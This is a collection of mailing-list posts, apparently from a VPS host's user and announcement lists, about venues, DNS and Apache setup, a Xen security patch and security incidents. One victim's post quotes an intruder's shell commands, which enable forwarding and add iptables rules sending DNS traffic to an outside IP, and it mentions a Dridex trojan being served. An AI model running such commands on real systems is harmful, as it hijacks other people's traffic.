Hello,
So as to avoid missing out on our chosen venue I'm thinking about
booking a table for the Christmas drinks in the next couple of days.
I don't think I want to go through the whole doodlepoll business to
find the most-wanted day as it takes ages and hasn't been that much
of a reliable indicator of who will turn up anyway!
I am just going to say: it's going to be the first week of December,
either Tuesday 1st, Wednesday 2nd or Thursday 3rd.
So on to venue. De Hems always seems to be a popular choice, but is
there anywhere else that anyone likes better?
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
Could someone please help me with setting up nameservers on a new
Bitfolk VPS (Debian Jessie with ISPConfig 3).
My old server has hostname vs1.vconsult.co.uk and the new one is
vs2.vconsult.co.uk
I currently use an external provider for Primary and Secondary DNS but
would now like to run my own nameservers.
vconsult.co.uk is hosted on UK2 who do not appear to support glue
records, needed for nameservers.
I have other domains that I could use on Fasthosts, who do appear to
support glue records.
So based on my limited knowledge of setting up nameservers, the options
I have are:
1. Transferring vconsult.co.uk to another registrar such as Fasthosts
and setting up ns1.vconsult.co.uk and ns2.vconsult.co.uk with glue records.
2. Changing the hostname on my new VPS to use a Fasthosts hosted domain
e.g. vs2.example.com and setting up ns1.example.com and ns2.example.com
with glue records .
3. Using a Fasthosts hosted domain to set up ns1.example.com and
ns2.example.com on the current hostname vs2.vconsult.co.uk
For Option 1 I'm not keen in case the transfer results in a break in
web/email services?
For Option 2 I'm not sure if there are any issues with changing the
hostname of the VPS, and would prefer to use my 'company' domain?
For Option 3 I'm not sure whether nameservers based on 'example.com' can
reside on vs2.vconsult.co.uk?
Any advice appreciated, sorry if this is a bit basic for most on the list.
Martin
The combination of Wheezy's version 5.4 PHP reaching the end of life
and the hack means I have been looking at having a new Jessie server.
The release notes for Jessie acknowledge that "We do not allow access
to the file system outside /var/www and /usr/share. If you are running
virtual hosts or scripts outside these directories, you need to
whitelist them in your configuration to grant access through HTTP."
Now, I have had virtual hosts in user's directories,
/home/*/public_html so that's me. And...
"You must allow access to your served directory explicity in the
corresponding virtual host, or by allowing access in apache2.conf as
proposed."
I think I have, in both, but everything is still getting served by the
default server. (As opposed to getting permission denied.)
In /etc/apache2.conf:
<Directory /home/username/public_html/>
Options FollowSymLinks
AllowOverride None
Require all granted
</Directory>
In /etc/apache2/sites-enabled (symlinked from sites-available)
<VirtualHost *>
DocumentRoot "/home/username/public_html/test"
ServerName example.co.uk
ServerAlias *.example.co.uk
ErrorLog /home/username/logs/test.example.co.uk.error.log
logFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\"
\"%{User-agent}i\" %T" commontime
CustomLog /home/username/logs/test.example.co.uk.access.log commontime
<Directory "/home/username/public_html/test">
Options FollowSymlinks
Require all granted
</Directory>
</VirtualHost>
What stupid thing am I (not) doing?
Ian
Hi,
There's a serious security bug in the Xen hypervisor currently under
embargo until 29th October.
The following of BitFolk's hosts are affected:
bellini.bitfolk.comdunkel.bitfolk.compresident.bitfolk.comsnaps.bitfolk.comsol.bitfolk.com
Some time before the 29th these hosts are going to require their
hypervisors to be upgraded and that upgrade will require the host to
be rebooted, so all VPSes on those hosts will also be shut down and
booted again.
I've not yet fixed exactly when this will be done. Most likely in
the early hours of the morning UK time across three nights close to
the end of the embargo.
To complicate matters further, as you're probably aware we're at the
moment in the middle of migrating customers to new hardware and
upgrading them in the process:
https://tools.bitfolk.com/wiki/Hardware_refresh,_2015-2016http://lists.bitfolk.com/lurker/message/20150927.060438.69cadb3d.en.html
One new host, snaps, has already been deployed and is now at full
capacity, so I'm in the process of deploying the next one now. That
means that the next one can be patched before customers are put on
it, and so the next batch of upgrades will side-step the need for
this other reboot.
So, if:
- You've already been contacted about migrating+upgrading your VPS
but you have so far chosen not to respond, and
- Your VPS is on one of the above listed hosts
then you may wish to consider going back to that email and agreeing
to the migration+upgrade as soon as possible, as otherwise you are
most likely going to experience some down time for the security
patch and ALSO some down time for your eventual forced
migration+upgrade.
I'll follow up as soon as I can with dates/times the patching and
reboots will take place.
Cheers,
Andy
--
http://bitfolk.com/ -- No-nonsense VPS hosting
_______________________________________________
announce mailing list
announce(a)lists.bitfolk.com
https://lists.bitfolk.com/mailman/listinfo/announce
Earlier this month, a Greek IP address failed to login to five WordPress
sites on two of my servers - not on BitFolk. One attempt each on four
sites, and seven on another spread over several days.
On Tuesday last week, it was blocked for 24 hours by both of them after
five failed attempts to login via ssh.
On Wednesday, it succeeded on one of them. Given the strength of the
password, the fact that it's not used (by me) anywhere else, and the
chance of doing this by random, I would quite like to know *how*.
I did login over ssh that day via my mobile, but there is no sign that
my phone is compromised - I logged into three other servers that day,
and none of them have seen this happen. Similarly, if my PC had an
issue, I would expect the other servers to be affected.
I would be wondering about the other people who know the password for
this one except that if it knew the password, why did the IP address
fail the previous day?
Two other 'not me' IP addresses have also since managed it, most
recently on Sunday.
What I can see that they did was firstly...
netstat -napu
cat /etc/resolv.conf
cat /etc/bind/named.conf.default-zones
ifconfig
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT
--to-destination 176.9.74.8:10054
iptables -t nat -A POSTROUTING -p udp -j MASQUERADE
iptables -t nat -L -v -n
iptables -t nat -L -v -n
ifconfig
iptables -L -v -n -x
iptables -I OUTPUT -p udp --sport 53 -j ACCEPT
iptables -I OUTPUT -p udp --dport 53 -j ACCEPT
iptables -L -v -n -x
exit
netstat -napu
exit
.. which, if I understand it correctly, is redirecting DNS requests to
that IP address (various sites reckon that's a site in Germany,
chipmanuals.com, apparently owned by someone in Tbilisi, Georgia...)
Secondly, on Sunday various files were placed in /tmp/.estbuild
including a copy of nginx.
This seems to have been serving a version of the Dridex trojan in the
form of a Windows .exe file from (domain name)/uniq/* before passing the
request onto Apache to 404 the /uniq/ URLs. Fortunately, because of how
it was set up, only requests to the server's own domain name were
affected and it looks like that only had about three human visitors in
that time, one of whom complained.
Obviously more could have happened - there's nothing else odd in various
log files, but clearly they cannot be completely trusted.
On the plus side, this was the server that was first in my queue to
replace with one running Debian Jessie, and it has been ten years since
anything like this has happened to me,* but grrr...
Ian
* The person who ended up being the boss of a former workplace opened an
executable attachment in an email both 'to' and 'from' them that they
knew they hadn't sent, but they "wanted to know what it was..."
I am on kwak. Just rebooted. After rebooting, system time was
about two hours in the future, until:
Oct 14 15:34:44 <myhost> ntpdate[461]: step time server
131.211.8.244 offset -7049.893933 sec
Is the initial time picked up off the host?
Hi,
I haven't done a security incident posting in a while, but that is
down to me forgetting to do them rather than any lack of them!
On 2nd October a customer's compromised Wordpress install was used
to attempt brute-force logins on another remote site's Wordpress.
This drew an abuse report which is how the original compromise was
discovered.
It's not known at this stage how the customer's Wordpress was
compromised. The site has been disabled.
Cheers,
Andy
About this email:
https://tools.bitfolk.com/wiki/Security_incident_postings
--
http://bitfolk.com/ -- No-nonsense VPS hosting